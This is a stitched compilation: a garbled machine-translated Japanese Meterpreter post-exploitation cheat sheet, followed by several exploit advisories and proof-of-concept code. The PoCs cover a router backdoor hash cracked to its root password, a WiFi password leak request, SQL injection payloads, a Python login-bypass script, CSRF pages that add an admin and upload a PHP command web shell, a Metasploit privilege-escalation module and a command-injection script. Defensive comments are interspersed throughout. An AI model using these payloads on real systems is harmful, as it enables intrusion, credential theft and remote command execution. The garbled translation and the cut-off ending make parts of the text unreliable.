/根/
編集c: \ boot.ini#
ファイルを編集します
getLWD#ローカルディレクトリを印刷します
getwd#print作業ディレクトリ
LCD#ローカルディレクトリを変更します
LS#現在のディレクトリのファイルのリストをリストします
LPWD#ローカルディレクトリを印刷します
PWD#出力作業ディレクトリ
CD C: \\ #enterディレクトリファイル
RMファイル#Deleteファイル
MKDIR DIER #Create Directoryの被害者システム
RMDIR#被害者システムに関する配信ディレクトリ
dir#ターゲットホストのファイルとフォルダー情報をリスト
MV#ターゲットホストのファイル名を変更します
検索-D d: \\ www -f web.config #searchファイル、d c: \\ -f*.docなど
MeterPreter Search -F AutoExec.BAT #Search FILEのSearch
MeterPreter Search -F Sea*.BAT C: \\ XAMP \\
enumdesktops #Number of User Logins
(1)ファイルをダウンロードします
コマンド「ダウンロード +ファイルパス」を使用して、ターゲットマシンの対応する権限のパスの下にファイルをダウンロードします
(2)ファイルをアップロードします
「アップロード」コマンドは、ファイルをターゲットマシンにアップロードすることです。図では、LL.TXTをターゲットマシンのC: \ PP \にアップロードしました。
(3)ファイルを表示します
「Cat Filename」は、現在のディレクトリのファイルコンテンツを表示します。コマンドを入力した後、表示しているファイルのコンテンツを返します。
(4)現在のパスを切り替えて照会します
「PWD」コマンドは、DOSコマンドの下の現在のパスを照会します。 「CD」コマンドは、下の図に示すように、現在のパスを変更できます。CD.は、現在のパスの下の前のディレクトリに切り替えることです。
(5)「sysinfo」コマンド
「sysinfo」コマンドは、リモートホストのシステム情報を表示し、コンピューター、システム情報、構造、言語、その他の情報を表示します。リモートホストのオペレーティングシステムはWindows XP Service Pack 2であり、このシステムには多くの脆弱性があることがわかります。
(6)コマンドを実行します
「実行」コマンドは、ターゲットホストのコマンドを実行します。ここで、「execute -H」がヘルプ情報を表示します。 -fは、実行するコマンドを実行することです。
ターゲットホストでプログラムを実行します。たとえば、現在プロセスをExplorer.exeに注入した後、実行ユーザーはスーパーマネージャー管理者です
ターゲットホストでメモ帳プログラムを実行しましょう
execute -fnotepad.exe
下の図に示すように、メモ帳プログラムがターゲットホストにすぐに表示されます:これはあまりにも明白です。バックグラウンド実行を非表示にする場合は、パラメーター-Hを追加します
execute -h -fnotepad.exe
この時点で、ターゲットホストのデスクトップは応答しませんでしたが、MeterPreterセッションでPSコマンドを使用してそれを見ました
別のものを見てください。ターゲットホストでCMD.exeプログラムを実行し、隠された方法でメータープレーターセッションで直接対話します。
注文:
execute -h -i -fcmd.exe
これは、シェルコマンドを使用するのと同じ効果を達成します
もう1つのことは、ターゲットホストのメモリでWCE.EXEやTrojanなどのターゲットホストの攻撃プログラムを直接実行して、ターゲットホストのハードディスクで発見または殺されることを避けるためです。
execute -h -m -d notepad.exe -f wce.exe -a
'-owce.txt'
-dターゲットホストが実行されたときに表示されるプロセス名(変装のため)
-mメモリから直接実行します
'-owce.txt'は、wce.exeの実行パラメーターです
(7)IDLETIMEコマンド
「idletime」コマンドは、ターゲットマシンが現在の操作なしコマンドに期限切れになった時間を表示します。図のディスプレイは、ターゲットホストが9分19秒前に操作を行うことを意味します。
(8)コマンドを検索します
「検索」コマンドは、ターゲットホストの特定のファイルを検索します。このコマンドは、システム全体または特定のフォルダーを検索できます。
「検索-H」コマンドを使用して、検索コマンドのヘルプ情報を表示します。
以下の図では、「検索–F aa.txt」コマンドは、現在のディレクトリにaa.txtファイルとターゲットマシンの現在のディレクトリのサブディレクトリがあるかどうかを確認します。もしそうなら、それはその道を示します。
「検索-f l*.txt C: \\ pp」は、C: \\ ppのLで始まるすべてのTXTファイルと、PPフォルダーの下のすべてのサブファイルを表示します。そのようなファイルがある場合、パスとサイズを返します。
(9)コマンドを編集します
VIエディターに電話して、ターゲットホストのファイルを変更する
たとえば、ターゲットホストのホストファイルを変更して、ターゲットホストがBaiduにアクセスするときに準備されたフィッシングWebサイトに移動するようにします(実験目的のみ)
ping www.baidu.comターゲットホストでは、出てくるターゲットIPは192.168.1.1ですを変更しました
3。ネットワークコマンド
ipconfig/ifconfig#IPアドレスを含むネットワークインターフェイスに関する重要な情報を表示します
portfwd -h
使用法:portfwd [-h] [add | delete | list | flush] [args]
オプション:
-lローカルホストをオプトして聴く(オプション)
-hヘルプバナー
-l聴くためにローカルポートを選択します
-p OPTはリモートポートに接続します
-rリモートホストを選択して接続します
portfwd add -l
4444 -P 3389 -R 192.168.1.102#ポート転送、ローカル監視4444、ターゲットマシン3389をローカル4444に転送
netstat -an | grep "4444 '#view指定されたポートの開口部
rdesktop -U Administrator -P BK#123 127.0.0.1:444444444444 #use rdesktop desktop、-u username -pパスワードに接続する
rdesktop 127.1.1.0:4444 #requiresユーザー名とパスワードをリモートで接続します
ルート#被害者ルーティングテーブルを表示または変更します
ルート追加192.168.1.0 255.255.255.0 1 #ADDダイナミックルート
ルートプリント#Routingテーブル出力
runget_local_subnets#ターゲットホストのイントラネットIPセグメントステータス
ARP#ARPバッファーテーブルのルック
GetProxy #Get Proxy
(1)portfwd
ネットワークコマンドリストIP情報(IPConfig)、ルーティングテーブルの変更(ルート)、およびポート転送(PORTFWD)を表示します。たとえば、portfwd:
ルールを確立した後、リモート3389ポートが転送されるように、ローカル3344ポートに接続できます。
(2)ルート
Routeコマンドを使用して、MeterPreterセッションでイントラネットをさらに貫通します。メータープレターのリバウンドセッションを削除して生成したホストは、イントラネットから外れている可能性があります。外にナットの層があります。イントラネットの他のホストに対する攻撃を直接起動することはできません。次に、生成されたメータープレターセッションをルーティングスプリングボードとして使用して、イントラネットの他のホストを攻撃できます。
最初にrunget_local_subnetsコマンドを使用して、撮影されたターゲットホストのイントラネットIPセグメントを表示できます。
コマンド:get_local_subnetsを実行します
下の図に示すように:
そのイントラネットには192.168.249.0/24ネットワークセグメントがありますが、直接アクセスできません。
ルートをしましょう。次のホップは、現在取得したホストのセッション(現在5)です。つまり、249ネットワークセグメントのすべての攻撃トラフィックは、侵入したターゲットホストのメータープレーターセッションに通過します。
コマンド:ルート追加192.168.249.0
255.255.255.0 5
次に、ルートプリントを使用してルーティングテーブルを表示します。効果は次のとおりです。
最後に、このルートを使用して、このルートを介して249ネットワークセグメントのMS08-067の脆弱性を備えた別のホストを攻撃し、下の図に示すように、別のイントラネットホスト192.168.249.1を正常に取得できます。
ほとんどの場合、MeterPRを取得します
# Exploit Title: Netis E1+ 1.2.32533 - Backdoor Account (root)
# Date: 2020-04-25
# Author: Besim ALTINOK
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
# Version: V1.2.32533
# Tested on: Netis E1+ V1.2.32533
# Credit: İsmail BOZKURT
-----------------------------
*root:abSQTPcIskFGc:0:0:root:/:/bin/sh*
Created directory: /home/pentestertraining/.john
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: MaxLen = 13 is too large for the current hash type, reduced
to 8
realtek          (root)
1g 0:00:00:28 3/3 0.03533g/s 1584Kp/s 1584Kc/s 1584KC/s realka2..reasll5
Use the "--show" option to display all of the cracked passwords reliably
Session completed
# Exploit Title: PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload
# Date: 2020-04-24
# Author: Besim ALTINOK
# Vendor Homepage: https://www.php-fusion.co.uk/home.php
# Software Link: https://sourceforge.net/projects/php-fusion/files/PHP-Fusion%20Archives/9.x/PHP-Fusion%209.03.50.zip/download
# Version: v9.03.50
# Tested on: Xampp
# Credit: İsmail BOZKURT and AkkuS
-------------------------------------------------------------------------------------------------
Description
---
- This system does not check the file extension when a user uploads a photo
for the avatar, so you can upload a PHP file such as:
Content of the file
--
Sample PHP code: <? phpinfo(); ?>
Name of the file:
---
Sample PHP File name: tester.php
- To reproduce, upload an image to the avatar field but change the file
name and content as shown above.
----------------------------------------------------------------------------------------
Vulnerable code section in the UserFieldsInput.inc
----------------------------------------------------------
/**
 * Apply the avatar part of the posted profile form.
 *
 * - When delAvatar is posted: unlink the current avatar under IMAGES."avatars/"
 *   (only if that file exists) and clear data['user_avatar'].
 * - When a user_avatar file is posted: pass it through form_sanitizer() and,
 *   if the result reports no error, store the returned image_name.
 *
 * NOTE(review): this method performs no extension or content-type check of
 * its own; whether form_sanitizer() enforces an image-only allow-list is not
 * visible here. The advisory above reports that a .php upload is accepted,
 * so that check should be confirmed (or added) before image_name is persisted,
 * and the avatars directory should not be served as executable content.
 */
private function _setUserAvatar() {
    if (isset($_POST['delAvatar'])) {
        // Remove the old file only when it really exists and is a regular file.
        if ($this->userData['user_avatar'] != "" &&
            file_exists(IMAGES."avatars/".$this->userData['user_avatar']) &&
            is_file(IMAGES."avatars/".$this->userData['user_avatar'])) {
            unlink(IMAGES."avatars/".$this->userData['user_avatar']);
        }
        $this->data['user_avatar'] = '';
    }
    if (isset($_FILES['user_avatar']) &&
        $_FILES['user_avatar']['name']) { // uploaded avatar
        if (!empty($_FILES['user_avatar']) &&
            is_uploaded_file($_FILES['user_avatar']['tmp_name'])) {
            $upload = form_sanitizer($_FILES['user_avatar'], '',
                'user_avatar');
            // Accept the upload only when form_sanitizer() set a falsy 'error'.
            if (isset($upload['error']) && !$upload['error']) {
                // ^ maybe use empty($upload['error']) also can but
                //   maybe low end php version has problem on empty.
                $this->data['user_avatar'] = $upload['image_name'];
            }
        }
    }
}
# Exploit Title: Netis E1+ 1.2.32533 - Unauthenticated WiFi Password Leak
# Date: 2020-04-25
# Author: Besim ALTINOK
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
# Version: V1.2.32533
# Tested on: Netis E1+ V1.2.32533
# Credit: İsmail BOZKURT
-----------------------------
HTTP Request
-------------------------------------------
GET //netcore_get.cgi HTTP/1.1
Host: netisext.cc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: homeFirstShow=yes
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Detail of the HTTP Response:
-------------------------------------------
hange_name':'[ ]','ddns_domain':'','ddns_info':'[ ]','time_now':'01/14/2015
09:58:51','timezone':'-8
1','time_type':'1','daylight_save':'1','time_server':'65.55.56.206','time_date':'2015','time_date2':'1','time_date3':'14','time_time':'9','time_time2':'58','time_time3':'51','old_user':'','def_pwd_flag':'1','old_pwd':'','wakeup_mac':'00:00:00:00:00:00','rp_config_status':'35','rp_client_status':'3','rp_ap_ssid':'ExampleSSID','rp_ap_password':'WiFiPass123','rp_ap_users':'1','rp_client_ssid':'TestSSID','rp_client_bssid':'98:e7:f5:ab:95:ad','rp_client_password':'WiFiPass123','rp_client_time':'357','rp_client_signals':'65','rp_client_speeds':'117','rp_roaming_onoff':'16','rp_soon_ssid':'TestSSID','rp_soon_password':'WiFiPass123','rr_current_mode':'1','rp_diagnose_status':'0',"statistics_list":[{'type':'LAN','tx_pack':'0','rx_pack':'0','t
# Exploit Title: Online shopping system advanced 1.0 - 'p' SQL Injection
# Exploit Author : Majid kalantari
# Date: 2020-04-26
# Vendor Homepage : https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software link: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
# Version: -
# Tested on: Windows 10
# CVE: N/A
===============================================
# vulnerable file: product.php
# vulnerable parameter : p
# payload :
http://127.0.0.1:8081/phps/product.php?p=-10+union+select+1,2,3,concat(admin_email,%27----%27,admin_password),5,6,7,8+from+admin_info%23#
!
#Description: ($product_id input is not safe)
Line 46:
// product.php line 46: the 'p' query parameter is taken without validation.
$product_id = $_GET['p'];
// This first assignment is immediately overwritten by the next line.
$sql = " SELECT * FROM products ";
// $product_id is interpolated straight into the SQL text — the injection point
// this report describes. Mitigation: bind it as a parameter of a prepared
// statement (or cast it to int before use).
$sql = " SELECT * FROM products WHERE product_id = $product_id";
===============================================
# Exploit Title: Online Course Registration 2.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-04-25
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/online-course-registration-free-download/
# Version: 2.0
# Tested on: Kali Linux x64 5.4.0
# CVE : N/A
#There are multiple SQL injection vulnerabilities in the Online Course Registration PHP script:
#./check_availability.php: $result =mysqli_query($con,"SELECT studentRegno FROM courseenrolls WHERE course='$cid' and studentRegno=' $regid'");
#./check_availability.php: $result =mysqli_query($con,"SELECT * FROM courseenrolls WHERE course='$cid'");
#./check_availability.php: $result1 =mysqli_query($con,"SELECT noofSeats FROM course WHERE id='$cid'");
#./change-password.php:$sql=mysqli_query($con,"SELECT password FROM students where password='".md5($_POST['cpass'])."' && studentRegno='".$_SESSION['login']."'");
#./admin/check_availability.php: $result =mysqli_query($con,"SELECT StudentRegno FROM students WHERE StudentRegno='$regno'");
#./admin/change-password.php:$sql=mysqli_query($con,"SELECT password FROM admin where password='".md5($_POST['cpass'])."' && username='".$_SESSION['alogin']."'");
#./admin/index.php:$query=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'");
#./index.php:$query=mysqli_query($con,"SELECT * FROM students WHERE StudentRegno='$regno' and password='$password'");
#./includes/header.php: $ret=mysqli_query($con,"SELECT * from userlog where studentRegno='".$_SESSION['login']."' order by id desc limit 1,1");
#./pincode-verification.php:$sql=mysqli_query($con,"SELECT * FROM students where pincode='".trim($_POST['pincode'])."' && StudentRegno='".$_SESSION['login']."'");
#It is also possible to bypass the authentication in the two login pages:
#!/usr/bin/python3
# Dependency bootstrap: the bare except only prints an install hint and does
# not exit, so a missing module surfaces later as a NameError on init()/colored().
try:
from termcolor import colored
from colorama import init
import argparse
import requests
except:
print("Please run pip3 install termcolor,colorama,argparse,requests")
init()
# Coloured status prefixes used by main() below.
symbol_green=colored("[+]", 'green')
symbol_red=colored("[-]", 'red')
# Single positional argument: the base URL of the application under test.
parser = argparse.ArgumentParser()
parser.add_argument('url', help='The URL of the target.')
args = parser.parse_args()
# Admin login page; its query (admin/index.php, listed above) concatenates the
# submitted username and password straight into the SQL text.
adminurl = args.url + '/onlinecourse/admin/'
def main():
# Sends one login POST whose username field carries a SQL tautology.  Because
# admin/index.php concatenates $username into its WHERE clause (see the query
# listed above), the clause becomes always-true and the rest of the statement,
# including the password comparison, is commented out by the `-- `.
# Defensive fix: a prepared statement with bound parameters; never build the
# query from request strings.
initial='Online Course Registration Authentication Bypass in %s' % ( args.url ) + "\n"
print(colored(initial, 'yellow'))
sess = requests.session()
data_login = {
'username': "admin' or 1=1 -- ",
'password': 'whatever',
'submit': ''
}
try:
# verify=False disables TLS certificate validation for this request.
req = sess.post(adminurl, data=data_login, verify=False, allow_redirects=True)
resp_code = req.status_code
except:
print(symbol_red+" The request didn't work!\n")
exit()
# Success is inferred from a JavaScript fragment (presumably the admin
# change-password form) appearing in the response body.
if resp_code == 200 and "document.chngpwd.cpass.value" in req.text:
print(symbol_green+" Authentication bypassed for admin user!\n")
print(symbol_green+" To test this manually, visit: " + adminurl+ " and enter: admin' or 1=1 -- in the username field and whatever in password field, then click the Log Me In button\n")
else:
print(symbol_red+" Fail!")
main()
# Exploit Title: Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-04-26
# Author: Besim ALTINOK
# Vendor Homepage: https://www.maiansupport.com
# Software Link: https://www.maiansupport.com/zip.html
# Version: v4.3
# Tested on: Xampp
# Credit: İsmail BOZKURT
----------------------------------------------
Here is the Detail:
--------------------------------------------------
This product is unprotected against CSRF vulnerabilities. With this attack,
you can add an admin account to the system. In addition, you can add files
from the F.A.Q field as admin. There are no file restrictions here.
Therefore, you can upload a PHP file here with CSRF.
If you want, you can add an admin account first and then access the system
and upload files.
Or you can upload files with direct admin rights.
---------------------------------------------------
CSRF PoC - 1 (Add Administrator user)
-------------------------------------
<!--
  CSRF proof of concept: a cross-site HTML form that a logged-in helpdesk
  administrator is lured into submitting.  The browser attaches the victim's
  session cookie automatically and the endpoint evidently performs no
  anti-CSRF token or Origin check, so the POST creates a new account with
  admin="yes".
  Mitigations (server side): a per-session CSRF token validated on
  admin/index.php?ajax=team, SameSite=Lax or Strict on the session cookie,
  rejection of state-changing requests whose Origin/Referer is foreign, and
  re-authentication for privilege-granting actions.
-->
<html>
<body>
<!-- Rewrites the address bar to "/" so the PoC page's real path is not displayed. -->
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/helpdesk/admin/index.php?ajax=team"
method="POST">
<!-- The hidden fields appear to mirror the legitimate "add team member" form,
     with every permission flag set to "yes"; the victim only sees the button. -->
<input type="hidden" name="enabled" value="yes" />
<input type="hidden" name="admin" value="yes" />
<input type="hidden" name="welcome" value="yes" />
<input type="hidden" name="name" value="Besim ALTINOK" />
<input type="hidden" name="email" value="test2@gmail.com" />
<input type="hidden" name="accpass" value="111111" />
<input type="hidden" name="timezone" value="0" />
<input type="hidden" name="language" value="" />
<input type="hidden" name="addpages" value="" />
<input type="hidden" name="notePadEnable" value="yes" />
<input type="hidden" name="enableLog" value="yes" />
<input type="hidden" name="mergeperms" value="yes" />
<input type="hidden" name="profile" value="yes" />
<input type="hidden" name="ticketHistory" value="yes" />
<input type="hidden" name="close" value="yes" />
<input type="hidden" name="lock" value="yes" />
<input type="hidden" name="editperms[]" value="ticket" />
<input type="hidden" name="editperms[]" value="reply" />
<input type="hidden" name="timer" value="yes" />
<input type="hidden" name="startwork" value="yes" />
<input type="hidden" name="workedit" value="yes" />
<input type="hidden" name="notify" value="yes" />
<input type="hidden" name="spamnotify" value="yes" />
<input type="hidden" name="signature" value="" />
<input type="hidden" name="nameFrom" value="" />
<input type="hidden" name="emailFrom" value="" />
<input type="hidden" name="email2" value="" />
<input type="hidden" name="notes" value="" />
<input type="hidden" name="mailbox" value="yes" />
<input type="hidden" name="mailDeletion" value="yes" />
<input type="hidden" name="mailScreen" value="yes" />
<input type="hidden" name="mailCopy" value="yes" />
<input type="hidden" name="mailFolders" value="5" />
<input type="hidden" name="mailPurge" value="0" />
<input type="hidden" name="digest" value="yes" />
<input type="hidden" name="process" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
- After adding the admin account, you can upload the PHP file.
CSRF PoC 2 - ( Directly, File Upload)
----------------------------------------------------
<!--
  CSRF proof of concept 2: a cross-origin XMLHttpRequest that uploads a PHP
  file through the F.A.Q attachment endpoint using the victim's own session.
  No CORS preflight is needed because multipart/form-data and the headers set
  below appear to fall within the CORS-safelisted set; the attacker cannot
  read the response, but the server-side write has already happened.
  Mitigations: CSRF token and Origin check on admin/index.php?ajax=faqattach;
  a server-side allowlist of attachment extensions and MIME types (the
  client-supplied filename and Content-Type must not be trusted); storing
  attachments outside the web root, or in a directory where the web server
  does not execute PHP.  A newly written .php file under the attachments
  directory (content/attachments-faq/ in the request below) is a detection
  indicator.
-->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
// Builds the multipart body by hand; the file part's filename ("shell.php")
// and Content-Type (text/php) come from this string, not from any real file.
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/localhost\/helpdesk\/admin\/index.php?ajax=faqattach", true);
xhr.setRequestHeader("Accept", "application\/json,
text\/javascript, *\/*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------1851832753272583700731626849");
// withCredentials makes the browser attach the helpdesk session cookie to
// this cross-site request.
xhr.withCredentials = true;
var body =
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"file[]\";
filename=\"shell.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php echo system($_GET[\'cmd\']); ?\x3e\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"file[]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"remote[]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"remote[]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"remote[]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"process\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"opath\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849--\r\n";
// The body is sent as raw bytes so no encoding step alters it.
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
HTTP Request:
-----------------------------------------------------------------------------------------
GET /helpdesk/content/attachments-faq/shell.php?cmd=ls HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=4574c8e8190d39edd9d13a0fd9a502ec;
bp_ut_session={"pageviews":1,"referrer":"
http://localhost/olms/library/assets/js/images/","landingPage":"
http://localhost/olms/library/assets/js/images/sort_asc.html
","started":1587817504988};
HESKb910af33bb5d80030b1f4b6f8666b57fac433d4d=71c43ff24f63f83f5a34d28997251db6
Upgrade-Insecure-Requests: 1
HTTP Response:
-------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 26 Apr 2020 12:15:31 GMT
Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1f PHP/7.2.29 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/7.2.29
Content-Length: 39
Connection: close
Content-Type: text/html; charset=UTF-8
shell.php
shell_test.php
shell_test.php
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
##
# Local privilege escalation through a user-writable directory that Docker
# Desktop later executes from (CVE-2019-15752): the module writes a payload EXE
# named docker-credential-wincred.exe into %PROGRAMDATA%\DockerDesktop\version-bin
# and, per the description, it is executed automatically by the docker user at
# the next login.
# Defensive notes: the root cause is a ProgramData subdirectory writable by
# unprivileged users; restricting its ACL (or upgrading past 2.1.0.1, as the
# description states) removes the issue.  Creation of
# docker-credential-wincred.exe in that path by a non-admin account is a
# reasonable detection signal.
##
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Post::Windows::Priv
include Post::Windows::Runas
# Module metadata.  PROGRAMDATA is the only option; it defaults to the
# environment variable so the path is expanded on the target (see exploit).
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',
'Description' => %q{
This exploit leverages a vulnerability in docker desktop
community editions prior to 2.1.0.1 where an attacker can write
a payload to a lower-privileged area to be executed
automatically by the docker user at login.
},
'License' => MSF_LICENSE,
'Author' => [
'Morgan Roman', # discovery
'bwatters-r7', # metasploit module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [[ 'Automatic', {} ]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'WfsDelay' => 15
},
'DisclosureDate' => '2019-07-05',
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'References' => [
['CVE', '2019-15752'],
['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
]
)
)
register_options(
[OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]
)
end
# Runs `docker -v` on the target and returns the first dotted X.Y.Z version in
# the output as a Gem::Version.  Assumes such a string is present: `match(...)[0]`
# raises NoMethodError when the output has no version (e.g. docker not on PATH).
def docker_version
output = cmd_exec('cmd.exe', '/c docker -v')
vprint_status(output)
version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0]
Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))
end
# Appears when the reported docker version is <= 18.09.0, Safe otherwise.
# NOTE(review): the description refers to Docker Desktop < 2.1.0.1, but this
# compares the engine/CLI version printed by `docker -v`; presumably 18.09.0 is
# the engine bundled with the last vulnerable Desktop release; confirm.
def check
if docker_version <= Gem::Version.new('18.09.0')
return CheckCode::Appears
end
CheckCode::Safe
end
# Drops the payload EXE into the version-bin directory.  "Always Notify" UAC
# levels abort; UAC_NO_PROMPT instead falls back to shell_execute_exe
# (presumably from Post::Windows::Runas) and returns without writing a file.
def exploit
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end
# make payload
# The directory must already exist; the module does not create it.
docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin")
fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)
# Named after Docker's Windows credential helper; nothing here waits for or
# confirms execution, which depends on the user logging in later.
payload_name = 'docker-credential-wincred.exe'
payload_pathname = "#{docker_path}\\#{payload_name}"
vprint_status('Making Payload')
payload = generate_payload_exe
# upload Payload
vprint_status("Uploading Payload to #{payload_pathname}")
write_file(payload_pathname, payload)
vprint_status('Payload Upload Complete')
print_status('Waiting for user to attempt to login')
end
# Aborts unless check returned Appears, and also when the session is already
# admin or SYSTEM (nothing to escalate).
def check_permissions!
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
# is_in_admin_group can be nil, true, or false
# (the two lines above appear to be left over; nothing in this method uses
# is_in_admin_group)
end
end
# Exploit Title: Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
# Date: 2020-04-27
# Exploit Author: 0xEmma/BugByte/SebastianPC
# Vendor Homepage: https://www.valvesoftware.com/en/
# Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
# Tested on: MacOS 15.3
# CVE : CVE-2020-12242
# PoC for CVE-2020-12242 (per the header).  On POSIX hosts the script writes a
# shell fragment to /tmp/hl2_relaunch, a path in a directory that is typically
# writable by every local user; presumably the engine reads and evaluates this
# file when it relaunches itself, which is how the user-supplied command runs.
# Defensive notes: a program must never take commands from a path other users
# can write to; use a private directory (mode 0700) or an anonymous file, and
# quote or validate anything interpolated into a shell string.  A pre-existing
# /tmp/hl2_relaunch containing shell metacharacters is a detection indicator.
# random and sys are imported but not used below.
import os, random, sys
banner = """
:'######:::'#######::'##::::'##::'######:::'#######::'##:::'##::::'##:::'########:
'##... ##:'##.... ##: ##:::: ##:'##... ##:'##.... ##: ##::'##:::'####:::... ##..::
##:::..:: ##'### ##: ##:::: ##: ##:::..::..::::: ##: ##:'##::::.. ##:::::: ##::::
. ######:: ## ### ##: ##:::: ##: ##::::::::'#######:: #####::::::: ##:::::: ##::::
:..... ##: ## #####:: ##:::: ##: ##::::::::...... ##: ##. ##:::::: ##:::::: ##::::
'##::: ##: ##.....::: ##:::: ##: ##::: ##:'##:::: ##: ##:. ##::::: ##:::::: ##::::
. ######::. #######::. #######::. ######::. #######:: ##::. ##::'######:::: ##::::
:......::::.......::::.......::::......::::.......:::..::::..:::......:::::..:::::
"""
print(banner)
if os.name == "posix":
# The command is read interactively and wrapped in '"; ' ... '; echo "', which
# presumably closes a double-quoted context in whatever consumes the file.
command = str(input("Code to run? "))
payload = '"; ' + command + '; echo "'
# Plain open/write with no mode restriction or error handling; an existing
# file is truncated.
f = open("/tmp/hl2_relaunch", "w")
f.write(payload)
f.close()
if os.name == "nt":
print("Windows based OS's not supported, see CVE-2020-12242")
# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT
SQL Injection Detail
--------------------------------
*# Vulnerable parameter: es_messagesid*
*# Vulnerable code:*
// Message detail lookup for the student area (fragment).  $es_messagesid is
// presumably the GET parameter named in the advisory; it is concatenated into
// the SQL text unquoted and unvalidated, so the query is injectable.  The
// session user_id is concatenated the same way.  The '*' characters around
// $es_messagesid are bold-markup artefacts from the advisory, not PHP.
// Fix: cast the id to int or, better, use a prepared statement with bound
// parameters for both values.
if($action=="fullmessage_sent"){
$msg_qry ="SELECT * FROM es_messages WHERE
from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and
es_messagesid=".*$es_messagesid;*
$details_message=$db->getrow($msg_qry);
}
?>
*Here is the SQLmap output:*
*----------------------------------------*
GET parameter '*es_messagesid*' is vulnerable.
sqlmap identified the following injection point(s):
---
